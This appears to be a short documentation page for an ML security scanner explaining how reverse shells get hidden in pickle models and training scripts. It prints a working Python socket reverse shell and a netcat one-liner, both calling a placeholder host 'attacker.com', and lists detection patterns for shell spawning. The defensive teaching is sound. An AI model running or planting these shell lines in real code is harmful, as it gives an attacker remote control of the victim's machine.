Reverse Shell Detection: Finding Backdoors in ML Code

The "Phone Home" Attack

A Reverse Shell is a technique where a compromised machine initiates a connection outbound to the attacker's server. This bypasses inbound firewalls (which usually block incoming connections but allow outgoing traffic for updates).

In the AI world, reverse shells are often embedded in:

Pickle Models: The __reduce__ payload executes a Python one-liner to connect back to the hacker.
Training Scripts: A malicious pull request adds a "logging" function that actually opens a shell.

The Anatomy of a Python Backdoor

A classic Python reverse shell looks like this:

import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("attacker.com",4444))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])

Or the shorter Netcat variant: os.system("nc -e /bin/sh attacker.com 4444")

Static Analysis Defense

While runtime detection (EDR) is best for catching active shells, Static Analysis can catch the code before it runs.

Veritensor looks for high-risk combinations of commands that indicate shell spawning:

/bin/sh or /bin/bash inside os.system or subprocess.
Usage of socket combined with subprocess.
Common tools like nc, ncat, netcat with the -e flag.

Scanning your model weights and training scripts for these patterns is a critical step in MLSecOps.

The "Phone Home" Attack​

The Anatomy of a Python Backdoor​

Static Analysis Defense​

The "Phone Home" Attack

The Anatomy of a Python Backdoor

Static Analysis Defense